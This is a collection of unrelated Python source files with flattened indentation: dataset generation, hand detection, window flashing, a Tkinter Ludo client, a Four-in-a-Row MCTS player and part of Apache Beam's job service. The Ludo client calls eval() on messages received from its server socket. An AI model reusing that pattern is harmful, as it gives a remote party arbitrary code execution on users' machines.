if args.num_cpu > args.num_episode:
args.num_cpu = args.num_episode
printYellow("num_cpu cannot be greater than num_episode, defaulting to {} cpus.".format(args.num_cpu))
# this is done so that seeds 0 and 1 are different and not simply offsets of the same dataset.
args.seed = np.random.RandomState(args.seed).randint(int(1e10))
if args.img_shape is None:
# args.img_shape = None # (3,224,224)
pass
else:
args.img_shape = tuple(map(int, args.img_shape[1:-1].split(",")))
# File exists, need to deal with it
if not args.no_record_data and os.path.exists(args.save_path + args.name):
assert args.force, "Error: save directory '{}' already exists".format(args.save_path + args.name)
shutil.rmtree(args.save_path + args.name)
for part in glob.glob(args.save_path + args.name + "_part-[0-9]*"):
shutil.rmtree(part)
if not args.no_record_data:
# create the output
os.mkdir(args.save_path + args.name)
if args.num_cpu == 1:
env_thread(args, 0, partition=False, use_ppo2=args.run_ppo2, img_shape=args.img_shape)
else:
# try and divide into multiple processes, with an environment each
try:
jobs = []
for i in range(args.num_cpu):
process = multiprocessing.Process(target=env_thread, args=(args, i, True, args.run_ppo2, args.img_shape))
jobs.append(process)
for j in jobs:
j.start()
try:
for j in jobs:
j.join()
except Exception as e:
printRed("Error: unable to join thread")
raise e
except Exception as e:
printRed("Error: unable to start thread")
raise e
if not args.no_record_data and args.num_cpu > 1:
# sleep 1 second to avoid concurrency issues from multiprocessing (e.g., files still being written)
time.sleep(1)
# get all the parts
file_parts = sorted(glob.glob(args.save_path + args.name + "_part-[0-9]*"), key=lambda a: int(a.split("-")[-1]))
# move the config files from any one part, as they are identical across parts
os.rename(file_parts[0] + "/dataset_config.json", args.save_path + args.name + "/dataset_config.json")
os.rename(file_parts[0] + "/env_globals.json", args.save_path + args.name + "/env_globals.json")
ground_truth = None
preprocessed_data = None
# used to convert the part record_id to the fused record_id
record_id = 0
for part in file_parts:
# sort the record names alphabetically, then numerically
records = sorted(glob.glob(part + "/record_[0-9]*"), key=lambda a: int(a.split("_")[-1]))
record_id_start = record_id
for record in records:
os.renames(record, args.save_path + args.name + "/record_{:03d}".format(record_id))
record_id += 1
# fuse the npz files together, in the right order
if ground_truth is None:
# init
ground_truth = {}
preprocessed_data = {}
ground_truth_load = np.load(part + "/ground_truth.npz")
preprocessed_data_load = np.load(part + "/preprocessed_data.npz")
for arr in ground_truth_load.files:
if arr == "images_path":
ground_truth[arr] = np.array(
[convertImagePath(args, path, record_id_start) for path in ground_truth_load[arr]])
else:
ground_truth[arr] = ground_truth_load[arr]
for arr in preprocessed_data_load.files:
preprocessed_data[arr] = preprocessed_data_load[arr]
else:
ground_truth_load = np.load(part + "/ground_truth.npz")
preprocessed_data_load = np.load(part + "/preprocessed_data.npz")
for arr in ground_truth_load.files:
if arr == "images_path":
sanitised_paths = np.array(
[convertImagePath(args, path, record_id_start) for path in ground_truth_load[arr]])
ground_truth[arr] = np.concatenate((ground_truth[arr], sanitised_paths))
else:
ground_truth[arr] = np.concatenate((ground_truth[arr], ground_truth_load[arr]))
for arr in preprocessed_data_load.files:
preprocessed_data[arr] = np.concatenate((preprocessed_data[arr], preprocessed_data_load[arr]))
# remove the current part folder
shutil.rmtree(part)
# save the fused outputs
np.savez(args.save_path + args.name + "/ground_truth.npz", **ground_truth)
np.savez(args.save_path + args.name + "/preprocessed_data.npz", **preprocessed_data)
if args.reward_dist:
rewards, counts = np.unique(np.load(args.save_path + args.name + "/preprocessed_data.npz")['rewards'],
return_counts=True)
counts = ["{:.2f}%".format(val * 100) for val in counts / np.sum(counts)]
print("reward distribution:")
[print(" ", reward, count) for reward, count in list(zip(rewards, counts))]
if __name__ == '__main__':
st = time.time()
main()
print("Elapsed time: {:.2f}".format(time.time()-st))
|
detector_utils.py
|
# Utilities for object detector.
import numpy as np
import sys
import tensorflow as tf
import os
from threading import Thread
from datetime import datetime
import cv2
import label_map_util
from collections import defaultdict
detection_graph = tf.Graph()
sys.path.append("..")
# score threshold for showing bounding boxes.
_score_thresh = 0.27
MODEL_NAME = 'hand_inference_graph'
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_CKPT = 'frozen_inference_graph.pb'
# List of the strings that is used to add correct label for each box.
PATH_TO_LABELS = os.path.join(MODEL_NAME, 'hand_label_map.pbtxt')
NUM_CLASSES = 1
# load label map
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(
label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
# Load a frozen inference graph into memory
def load_inference_graph():
# load frozen tensorflow model into memory
print("> ====== loading HAND frozen graph into memory")
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
sess = tf.Session(graph=detection_graph)
print("> ====== Hand Inference graph loaded.")
return detection_graph, sess
# draw the detected bounding boxes on the images
# You can modify this to also draw a label.
def draw_box_on_image(num_hands_detect, score_thresh, scores, boxes, im_width, im_height, image_np):
for i in range(num_hands_detect):
if (scores[i] > score_thresh):
(left, right, top, bottom) = (boxes[i][0], boxes[i][1],
boxes[i][2], boxes[i][3])
p1 = (int(left), int(top))
p2 = (int(right), int(bottom))
cv2.rectangle(image_np, p1, p2, (77, 255, 9), 2, 1)
def get_center(num_hands_detect, score_thresh, scores, boxes, im_width, im_height, image_np):
count = 0
l = r = t = b = 0
for i in range(num_hands_detect):
if (scores[i] > score_thresh):
count += 1
(left, right, top, bottom) = (boxes[i][1] * im_width, boxes[i][3] * im_width,
boxes[i][0] * im_height, boxes[i][2] * im_height)
t += top
r += right
l += left
b += bottom
if count != 0:
l = l / count
r = r /count
t = t / count
b = b / count
return int((l+r) / 2), int((t+b) / 2)
# Show fps value on image.
def draw_fps_on_image(fps, image_np):
cv2.putText(image_np, fps, (20, 50),
cv2.FONT_HERSHEY_SIMPLEX, 0.75, (77, 255, 9), 2)
# Actual detection: generate scores and bounding boxes given an image
def detect_hands(image_np, detection_graph, sess):
# Definite input and output Tensors for detection_graph
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
detection_boxes = detection_graph.get_tensor_by_name(
'detection_boxes:0')
# Each score represents the level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
detection_scores = detection_graph.get_tensor_by_name(
'detection_scores:0')
detection_classes = detection_graph.get_tensor_by_name(
'detection_classes:0')
num_detections = detection_graph.get_tensor_by_name(
'num_detections:0')
image_np_expanded = np.expand_dims(image_np, axis=0)
(boxes, scores, classes, num) = sess.run(
[detection_boxes, detection_scores,
detection_classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
return np.squeeze(boxes), np.squeeze(scores)
# Code to thread reading camera input.
# Source : Adrian Rosebrock
# https://www.pyimagesearch.com/2017/02/06/faster-video-file-fps-with-cv2-videocapture-and-opencv/
class WebcamVideoStream:
def __init__(self, src, width, height):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def size(self):
# return size of the capture device
return self.stream.get(3), self.stream.get(4)
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
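# A minimal usage sketch tying this module together; the camera index, frame size and
# number of hands to draw are assumptions, not values taken from a calling script.
if __name__ == '__main__':
    detection_graph, sess = load_inference_graph()
    video = WebcamVideoStream(src=0, width=320, height=180).start()
    im_width, im_height = video.size()
    while True:
        frame = video.read()
        if frame is None:
            continue
        boxes, scores = detect_hands(frame, detection_graph, sess)
        draw_box_on_image(2, _score_thresh, scores, boxes, im_width, im_height, frame)
        cv2.imshow('hand detection', frame)
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
    video.stop()
    cv2.destroyAllWindows()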
|
flasher.py
|
"""Flashing windows."""
import logging
from threading import Thread
from time import sleep
from typing import Dict, List
from flashfocus.compat import Window
from flashfocus.types import Number
class Flasher:
"""Creates smooth window flash animations.
If a flash is requested on an already flashing window, the first request is
restarted and the second request is ignored. This ensures that Flasher
threads do not try to draw to the same window at the same time.
Parameters
----------
time: float
Flash interval in milliseconds
flash_opacity: float
Flash opacity as a decimal between 0 and 1
default_opacity: float
Default opacity for windows as a decimal between 0 and 1. Windows are
restored to this opacity after a flash.
ntimepoints: int
Number of timepoints in the flash animation. Higher values will lead to
smoother animations at the cost of increased X server requests.
Ignored if simple is True.
simple: bool
If True, don't animate flashes. Setting this parameter improves
performance but causes rougher opacity transitions.
Attributes
----------
flash_series: List[float]
The series of opacity transitions during a flash.
progress: Dict[int, int]
Keys are window ids for windows that are currently being flashed. Values
are indices in the flash_series which define the progress in the flash
animation.
timechunk: float
Number of seconds between opacity transitions.
"""
def __init__(
self,
time: Number,
flash_opacity: float,
default_opacity: float,
simple: bool,
ntimepoints: int,
) -> None:
self.default_opacity = default_opacity
self.flash_opacity = flash_opacity
self.time = time / 1000
if simple:
self.ntimepoints = 1
self.timechunk = self.time
self.flash_series = [flash_opacity]
else:
self.ntimepoints = ntimepoints
self.timechunk = self.time / self.ntimepoints
self.flash_series = self._compute_flash_series()
self.progress: Dict[int, int] = dict()
def flash(self, window: Window) -> None:
logging.debug(f"Flashing window {window.id}")
if self.default_opacity == self.flash_opacity:
return
if window.id in self.progress:
try:
self.progress[window.id] = 0
except KeyError:
# This happens in the rare case that the window is deleted from progress
# after the first if statement
self.flash(window)
else:
p = Thread(target=self._flash, args=[window])
p.daemon = True
p.start()
def set_default_opacity(self, window: Window) -> None:
"""Set the opacity of a window to its default."""
# This needs to occur in a separate thread or Xorg freaks out and
# doesn't allow further changes to window properties
p = Thread(target=window.set_opacity, args=[self.default_opacity])
p.daemon = True
p.start()
def _compute_flash_series(self) -> List[float]:
"""Calculate the series of opacity values for the flash animation.
Given the default window opacity, and the flash opacity, this method
calculates a smooth series of intermediate opacity values.
"""
opacity_diff = self.default_opacity - self.flash_opacity
flash_series = [
self.flash_opacity + ((x / self.ntimepoints) * opacity_diff)
for x in range(self.ntimepoints)
]
return flash_series
def _flash(self, window: Window) -> None:
"""Flash a window.
This function just iterates across `self.flash_series` and modifies the
window opacity accordingly. It waits `self.timechunk` between
modifications.
"""
self.progress[window.id] = 0
while self.progress[window.id] < self.ntimepoints:
target_opacity = self.flash_series[self.progress[window.id]]
window.set_opacity(target_opacity)
sleep(self.timechunk)
self.progress[window.id] += 1
logging.debug(f"Resetting window {window.id} opacity to default")
window.set_opacity(self.default_opacity)
del self.progress[window.id]
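# A worked example (hypothetical parameters) of the series built by
# _compute_flash_series(): with default_opacity=1.0, flash_opacity=0.8 and
# ntimepoints=4, the window steps through [0.8, 0.85, 0.9, 0.95] and is then
# restored to 1.0 at the end of _flash().
if __name__ == "__main__":
    demo = Flasher(time=200, flash_opacity=0.8, default_opacity=1.0, simple=False, ntimepoints=4)
    assert [round(v, 2) for v in demo.flash_series] == [0.8, 0.85, 0.9, 0.95]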
|
client.py
|
import socket
from tkinter import *
from threading import Thread
import random
from PIL import ImageTk, Image
screen_width = None
screen_height = None
SERVER = None
PORT = None
IP_ADDRESS = None
playerName = None
canvas1 = None
canvas2 = None
nameEntry = None
nameWindow = None
gameWindow = None
leftBoxes = []
rightBoxes = []
finishingBox = None
playerType = None
playerTurn = None
player1Name = 'joining'
player2Name = 'joining'
player1Label = None
player2Label = None
player1Score = 0
player2Score = 0
player1ScoreLabel = None
player2ScoreLabel = None
dice = None
rollButton = None
resetButton = None
winingMessage = None
winingFunctionCall = 0
def checkColorPosition(boxes, color):
for box in boxes:
boxColor = box.cget("bg")
if(boxColor == color):
return boxes.index(box)
return False
def rollDice():
global SERVER
# list of the six Unicode dice-face characters (values 1 to 6), written as \u escape sequences
diceChoices=['\u2680','\u2681','\u2682','\u2683','\u2684','\u2685']
# pick a random face to send to the server
value = random.choice(diceChoices)
global playerType
global rollButton
global playerTurn
rollButton.destroy()
playerTurn = False
if(playerType == 'player1'):
SERVER.send(f'{value}player2Turn'.encode())
if(playerType == 'player2'):
SERVER.send(f'{value}player1Turn'.encode())
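# The six Unicode die faces used in rollDice() correspond to the values 1-6; a small
# standalone illustration (not used by the game logic):
DICE_VALUES = dict(zip(['\u2680', '\u2681', '\u2682', '\u2683', '\u2684', '\u2685'], range(1, 7)))
# DICE_VALUES['\u2683'] == 4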
def leftBoard():
global gameWindow
global leftBoxes
global screen_height
xPos = 30
for box in range(0,11):
if(box == 0):
boxLabel = Label(gameWindow, font=("Helvetica",30), width=2, height=1, relief='ridge', borderwidth=0, bg="red")
boxLabel.place(x=xPos, y=screen_height/2 - 88)
leftBoxes.append(boxLabel)
xPos +=50
else:
boxLabel = Label(gameWindow, font=("Helvetica",55), width=2, height=1, relief='ridge', borderwidth=0, bg="white")
boxLabel.place(x=xPos, y=screen_height/2- 100)
leftBoxes.append(boxLabel)
xPos +=75
def rightBoard():
global gameWindow
global rightBoxes
global screen_height
xPos = 988
for box in range(0,11):
if(box == 10):
boxLabel = Label(gameWindow, font=("Helvetica",30), width=2, height=1, relief='ridge', borderwidth=0, bg="yellow")
boxLabel.place(x=xPos, y=screen_height/2-88)
rightBoxes.append(boxLabel)
xPos +=50
else:
boxLabel = Label(gameWindow, font=("Helvetica",55), width=2, height=1, relief='ridge', borderwidth=0, bg="white")
boxLabel.place(x=xPos, y=screen_height/2 - 100)
rightBoxes.append(boxLabel)
xPos +=75
def finishingBox():
global gameWindow
global finishingBox
global screen_width
global screen_height
finishingBox = Label(gameWindow, text="Home", font=("Chalkboard SE", 32), width=8, height=4, borderwidth=0, bg="green", fg="white")
finishingBox.place(x=screen_width/2 - 68, y=screen_height/2 -160)
def gameWindow():
global gameWindow
global canvas2
global screen_width
global screen_height
global dice
global winingMessage
global resetButton
gameWindow = Tk()
gameWindow.title("Ludo Ladder")
gameWindow.attributes('-fullscreen',True)
screen_width = gameWindow.winfo_screenwidth()
screen_height = gameWindow.winfo_screenheight()
bg = ImageTk.PhotoImage(file = "./assets/background.png")
canvas2 = Canvas( gameWindow, width = 500,height = 500)
canvas2.pack(fill = "both", expand = True)
# Display image
canvas2.create_image( 0, 0, image = bg, anchor = "nw")
# Add Text
canvas2.create_text( screen_width/2, screen_height/5, text = "Ludo Ladder", font=("Chalkboard SE",100), fill="white")
# Declaring winning message
winingMessage = canvas2.create_text(screen_width/2 + 10, screen_height/2 + 250, text = "", font=("Chalkboard SE",100), fill='#fff176')
# Creating Reset Button
resetButton = Button(gameWindow,text="Reset Game", fg='black', font=("Chalkboard SE", 15), bg="grey",command=restGame, width=20, height=5)
leftBoard()
rightBoard()
finishingBox()
global rollButton
rollButton = Button(gameWindow,text="Roll Dice", fg='black', font=("Chalkboard SE", 15), bg="grey",command=rollDice, width=20, height=5)
global playerTurn
global playerType
global playerName
global player1Name
global player2Name
global player1Label
global player2Label
global player1Score
global player2Score
global player1ScoreLabel
global player2ScoreLabel
if(playerType == 'player1' and playerTurn):
rollButton.place(x=screen_width / 2 - 80, y=screen_height/2 + 250)
else:
rollButton.pack_forget()
# Creating Dice with value 1
dice = canvas2.create_text(screen_width/2 + 10, screen_height/2 + 100, text = "\u2680", font=("Chalkboard SE",250), fill="white")
# Creating name board
player1Label = canvas2.create_text(400, screen_height/2 + 100, text = player1Name, font=("Chalkboard SE",80), fill='#fff176' )
player2Label = canvas2.create_text(screen_width - 300, screen_height/2 + 100, text = player2Name, font=("Chalkboard SE",80), fill='#fff176' )
# Creating Score Board
player1ScoreLabel = canvas2.create_text(400, screen_height/2 - 160, text = player1Score, font=("Chalkboard SE",80), fill='#fff176' )
player2ScoreLabel = canvas2.create_text(screen_width - 300, screen_height/2 - 160, text = player2Score, font=("Chalkboard SE",80), fill='#fff176' )
gameWindow.resizable(True, True)
gameWindow.mainloop()
def saveName():
global SERVER
global playerName
global nameWindow
global nameEntry
playerName = nameEntry.get()
nameEntry.delete(0, END)
nameWindow.destroy()
SERVER.send(playerName.encode())
gameWindow()
def askPlayerName():
global playerName
global nameEntry
global nameWindow
global canvas1
nameWindow = Tk()
nameWindow.title("Ludo Ladder")
nameWindow.attributes('-fullscreen',True)
screen_width = nameWindow.winfo_screenwidth()
screen_height = nameWindow.winfo_screenheight()
bg = ImageTk.PhotoImage(file = "./assets/background.png")
canvas1 = Canvas( nameWindow, width = 500,height = 500)
canvas1.pack(fill = "both", expand = True)
# Display image
canvas1.create_image( 0, 0, image = bg, anchor = "nw")
canvas1.create_text( screen_width/2, screen_height/5, text = "Enter Name", font=("Chalkboard SE",100), fill="white")
nameEntry = Entry(nameWindow, width=15, justify='center', font=('Chalkboard SE', 50), bd=5, bg='white')
nameEntry.place(x = screen_width/2 - 220, y=screen_height/4 + 100)
button = Button(nameWindow, text="Save", font=("Chalkboard SE", 30),width=15, command=saveName, height=2, bg="#80deea", bd=3)
button.place(x = screen_width/2 - 130, y=screen_height/2 - 30)
nameWindow.resizable(True, True)
nameWindow.mainloop()
def restGame():
global SERVER
SERVER.send("reset game".encode())
def handleWin(message):
global playerType
global rollButton
global canvas2
global winingMessage
global screen_width
global screen_height
global resetButton
#destroying button
if('Red' in message):
if(playerType == 'player2'):
rollButton.destroy()
if('Yellow' in message):
if(playerType == 'player1'):
rollButton.destroy()
# Adding winning message
message = message.split(".")[0] + "."
canvas2.itemconfigure(winingMessage, text = message)
#Placing Reset Button
resetButton.place(x=screen_width / 2 - 80, y=screen_height - 220)
def updateScore(message):
global canvas2
global player1Score
global player2Score
global player1ScoreLabel
global player2ScoreLabel
if('Red' in message):
player1Score +=1
if('Yellow' in message):
player2Score +=1
canvas2.itemconfigure(player1ScoreLabel, text = player1Score)
canvas2.itemconfigure(player2ScoreLabel, text = player2Score)
def handleResetGame():
global canvas2
global playerType
global gameWindow
global rollButton
global dice
global screen_width
global screen_height
global playerTurn
global rightBoxes
global leftBoxes
global finishingBox
global resetButton
global winingMessage
global winingFunctionCall
canvas2.itemconfigure(dice, text='\u2680')
# Handling Reset Game
if(playerType == 'player1'):
# Creating roll dice button
rollButton = Button(gameWindow,text="Roll Dice", fg='black', font=("Chalkboard SE", 15), bg="grey",command=rollDice, width=20, height=5)
rollButton.place(x=screen_width / 2 - 80, y=screen_height/2 + 250)
playerTurn = True
if(playerType == 'player2'):
playerTurn = False
for rBox in rightBoxes[-2::-1]:
rBox.configure(bg='white')
for lBox in leftBoxes[1:]:
lBox.configure(bg='white')
finishingBox.configure(bg='green')
canvas2.itemconfigure(winingMessage, text="")
resetButton.destroy()
# Again Recreating Reset Button for next game
resetButton = Button(gameWindow,text="Reset Game", fg='black', font=("Chalkboard SE", 15), bg="grey",command=restGame, width=20, height=5)
winingFunctionCall = 0
def recivedMsg():
global SERVER
global playerType
global playerTurn
global rollButton
global screen_width
global screen_height
global canvas2
global dice
global gameWindow
global player1Name
global player2Name
global player1Label
global player2Label
global winingFunctionCall
while True:
message = SERVER.recv(2048).decode()
if('player_type' in message):
recvMsg = eval(message)
playerType = recvMsg['player_type']
playerTurn = recvMsg['turn']
elif('player_names' in message):
players = eval(message)
players = players["player_names"]
for p in players:
if(p["type"] == 'player1'):
player1Name = p['name']
if(p['type'] == 'player2'):
player2Name = p['name']
elif('⚀' in message):
# Dice with value 1
canvas2.itemconfigure(dice, text='\u2680')
elif('⚁' in message):
# Dice with value 2
canvas2.itemconfigure(dice, text='\u2681')
elif('⚂' in message):
# Dice with value 3
canvas2.itemconfigure(dice, text='\u2682')
elif('⚃' in message):
# Dice with value 4
canvas2.itemconfigure(dice, text='\u2683')
elif('⚄' in message):
# Dice with value 5
canvas2.itemconfigure(dice, text='\u2684')
elif('⚅' in message):
# Dice with value 6
canvas2.itemconfigure(dice, text='\u2685')
elif('wins the game.' in message and winingFunctionCall == 0):
winingFunctionCall +=1
handleWin(message)
updateScore(message)
elif(message == 'reset game'):
handleResetGame()
#creating rollbutton
if('player1Turn' in message and playerType == 'player1'):
playerTurn = True
rollButton = Button(gameWindow,text="Roll Dice", fg='black', font=("Chalkboard SE", 15), bg="grey",command=rollDice, width=20, height=5)
rollButton.place(x=screen_width / 2 - 80, y=screen_height/2 + 250)
elif('player2Turn' in message and playerType == 'player2'):
playerTurn = True
rollButton = Button(gameWindow,text="Roll Dice", fg='black', font=("Chalkboard SE", 15), bg="grey",command=rollDice, width=20, height=5)
rollButton.place(x=screen_width / 2 - 80, y=screen_height/2 + 260)
def setup():
global SERVER
global PORT
global IP_ADDRESS
PORT = 8000
IP_ADDRESS = '127.0.0.1'
SERVER = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
SERVER.connect((IP_ADDRESS, PORT))
thread = Thread(target=recivedMsg)
thread.start()
askPlayerName()
setup()
|
player.py
|
# content: design and implementation of simple player classes. A background thread is used to simulate the computer player's moves.
import abc
from mcts.search import *
from mcts.node import TwoPlayerGameMonteCarloTreeSearchNode
from four_in_row.FourInRow import *
from threading import Thread
import time
class Player(object):
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def choose_next_move(self, node: TwoPlayerGameMonteCarloTreeSearchNode, game_window: GameWindow):
""" 选择下一步
:param
node: 当前棋局走势的节点(蒙特卡洛模拟树的一个节点)
:return: 下一个棋局走势的节点
"""
raise NotImplementedError()
@abc.abstractmethod
def __repr__(self):
raise NotImplementedError()
class ComputerPlayer(Player):
def choose_next_move(self, node, game_window):
""" 选择人机的下一步,并在窗口显示
:param node: 当前蒙特卡洛树的节点
:param game_window: GameWindow 游戏窗口
:return: TwoPlayerGameMonteCarloTreeSearchNode 最新的蒙特卡洛节点
"""
print("人机下棋:")
start = time.time()
search = AlphaBetaAndSimulator(node)
simulator_number = 6000
# Start a thread to run the computer player's move simulations
simulations_thread = Thread(target=search.best_action, args=(simulator_number,))
simulations_thread.start()
simulations_thread.join()
new_node = search.root.best_child
game_window.move_and_update(new_node.state.pre_action)
end = time.time()
print("用时:", end-start)
return new_node
def __repr__(self):
return "Computer"
class HumanPlayer(Player):
def choose_next_move(self, node, game_window):
""" 选择人的下一步,并在窗口显示
:param node: 当前蒙特卡洛树的节点
:param game_window: GameWindow 游戏窗口
:return: TwoPlayerGameMonteCarloTreeSearchNode 最新的蒙特卡洛节点
"""
print("人下棋:")
action = game_window.getHumanMove()
new_state = node.state.place(action)
new_node = TwoPlayerGameMonteCarloTreeSearchNode(new_state, node)
return new_node
def __repr__(self):
return "Human"
|
local_job_service.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import logging
import os
import queue
import shutil
import subprocess
import tempfile
import threading
import time
import traceback
from builtins import object
from typing import TYPE_CHECKING
from typing import List
from typing import Optional
import grpc
from google.protobuf import text_format # type: ignore # not in typeshed
from apache_beam.metrics import monitoring_infos
from apache_beam.portability.api import beam_artifact_api_pb2
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.portability.api import beam_job_api_pb2_grpc
from apache_beam.portability.api import beam_provision_api_pb2
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners.portability import abstract_job_service
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability import fn_api_runner
from apache_beam.utils.thread_pool_executor import UnboundedThreadPoolExecutor
if TYPE_CHECKING:
from google.protobuf import struct_pb2 # pylint: disable=ungrouped-imports
from apache_beam.portability.api import beam_runner_api_pb2
_LOGGER = logging.getLogger(__name__)
def _iter_queue(q):
while True:
yield q.get(block=True)
class LocalJobServicer(abstract_job_service.AbstractJobServiceServicer):
"""Manages one or more pipelines, possibly concurrently.
Experimental: No backward compatibility guaranteed.
Servicer for the Beam Job API.
This JobService uses a basic local runner implementation to run the job.
This JobService is not capable of managing jobs on remote clusters.
By default, this JobService executes the job in process but still uses GRPC
to communicate pipeline and worker state. It can also be configured to use
inline calls rather than GRPC (for speed) or launch completely separate
subprocesses for the runner and worker(s).
"""
def __init__(self, staging_dir=None):
super(LocalJobServicer, self).__init__()
self._cleanup_staging_dir = staging_dir is None
self._staging_dir = staging_dir or tempfile.mkdtemp()
self._artifact_service = artifact_service.BeamFilesystemArtifactService(
self._staging_dir)
self._artifact_staging_endpoint = None # type: Optional[endpoints_pb2.ApiServiceDescriptor]
def create_beam_job(self,
preparation_id, # type: str
job_name, # type: str
pipeline, # type: beam_runner_api_pb2.Pipeline
options # type: struct_pb2.Struct
):
# type: (...) -> BeamJob
# TODO(angoenka): Pass an appropriate staging_session_token. The token can
# be obtained in PutArtifactResponse from JobService
if not self._artifact_staging_endpoint:
# The front-end didn't try to stage anything, but the worker may
# request what's here so we should at least store an empty manifest.
self._artifact_service.CommitManifest(
beam_artifact_api_pb2.CommitManifestRequest(
staging_session_token=preparation_id,
manifest=beam_artifact_api_pb2.Manifest()))
provision_info = fn_api_runner.ExtendedProvisionInfo(
beam_provision_api_pb2.ProvisionInfo(
job_id=preparation_id,
job_name=job_name,
pipeline_options=options,
retrieval_token=self._artifact_service.retrieval_token(
preparation_id)),
self._staging_dir)
return BeamJob(
preparation_id,
pipeline,
options,
provision_info,
self._artifact_staging_endpoint)
def get_bind_address(self):
"""Return the address used to open the port on the gRPC server.
This is often, but not always the same as the service address. For
example, to make the service accessible to external machines, override this
to return '[::]' and override `get_service_address()` to return a publicly
accessible host name.
"""
return self.get_service_address()
def get_service_address(self):
"""Return the host name at which this server will be accessible.
In particular, this is provided to the client upon connection as the
artifact staging endpoint.
"""
return 'localhost'
def start_grpc_server(self, port=0):
self._server = grpc.server(UnboundedThreadPoolExecutor())
port = self._server.add_insecure_port(
'%s:%d' % (self.get_bind_address(), port))
beam_job_api_pb2_grpc.add_JobServiceServicer_to_server(self, self._server)
beam_artifact_api_pb2_grpc.add_ArtifactStagingServiceServicer_to_server(
self._artifact_service, self._server)
hostname = self.get_service_address()
self._artifact_staging_endpoint = endpoints_pb2.ApiServiceDescriptor(
url='%s:%d' % (hostname, port))
self._server.start()
    _LOGGER.info('Grpc server started at %s on port %d', hostname, port)
return port
def stop(self, timeout=1):
self._server.stop(timeout)
if os.path.exists(self._staging_dir) and self._cleanup_staging_dir:
shutil.rmtree(self._staging_dir, ignore_errors=True)
def GetJobMetrics(self, request, context=None):
if request.job_id not in self._jobs:
raise LookupError("Job {} does not exist".format(request.job_id))
result = self._jobs[request.job_id].result
monitoring_info_list = []
for mi in result._monitoring_infos_by_stage.values():
monitoring_info_list.extend(mi)
# Filter out system metrics
user_monitoring_info_list = [
x for x in monitoring_info_list
if monitoring_infos._is_user_monitoring_info(x) or
monitoring_infos._is_user_distribution_monitoring_info(x)
]
return beam_job_api_pb2.GetJobMetricsResponse(
metrics=beam_job_api_pb2.MetricResults(
committed=user_monitoring_info_list))
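# Hedged usage sketch (added for illustration, not part of the original module):
# how a LocalJobServicer might be brought up and torn down. Kept as comments so
# nothing runs at import time.
#
#   servicer = LocalJobServicer()
#   port = servicer.start_grpc_server()  # returns the actual bound port
#   # ... submit a portable pipeline against 'localhost:%d' % port ...
#   servicer.stop()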
class SubprocessSdkWorker(object):
"""Manages a SDK worker implemented as a subprocess communicating over grpc.
"""
def __init__(self,
worker_command_line, # type: bytes
control_address,
worker_id=None
):
self._worker_command_line = worker_command_line
self._control_address = control_address
self._worker_id = worker_id
def run(self):
logging_server = grpc.server(UnboundedThreadPoolExecutor())
logging_port = logging_server.add_insecure_port('[::]:0')
logging_server.start()
logging_servicer = BeamFnLoggingServicer()
beam_fn_api_pb2_grpc.add_BeamFnLoggingServicer_to_server(
logging_servicer, logging_server)
logging_descriptor = text_format.MessageToString(
endpoints_pb2.ApiServiceDescriptor(url='localhost:%s' % logging_port))
control_descriptor = text_format.MessageToString(
endpoints_pb2.ApiServiceDescriptor(url=self._control_address))
env_dict = dict(
os.environ,
CONTROL_API_SERVICE_DESCRIPTOR=control_descriptor,
LOGGING_API_SERVICE_DESCRIPTOR=logging_descriptor
)
# only add worker_id when it is set.
if self._worker_id:
env_dict['WORKER_ID'] = self._worker_id
with fn_api_runner.SUBPROCESS_LOCK:
p = subprocess.Popen(
self._worker_command_line,
shell=True,
env=env_dict)
try:
p.wait()
if p.returncode:
raise RuntimeError(
'Worker subprocess exited with return code %s' % p.returncode)
finally:
if p.poll() is None:
p.kill()
logging_server.stop(0)
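# Hedged usage sketch (illustrative only; the command line and control address
# below are placeholders, not values taken from this module):
#
#   worker = SubprocessSdkWorker(
#       b'python -m apache_beam.runners.worker.sdk_worker_main',
#       control_address='localhost:50000')
#   worker.run()  # blocks until the worker subprocess exits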
class BeamJob(abstract_job_service.AbstractBeamJob):
"""This class handles running and managing a single pipeline.
The current state of the pipeline is available as self.state.
"""
def __init__(self,
job_id, # type: str
pipeline,
options,
provision_info, # type: fn_api_runner.ExtendedProvisionInfo
artifact_staging_endpoint # type: Optional[endpoints_pb2.ApiServiceDescriptor]
):
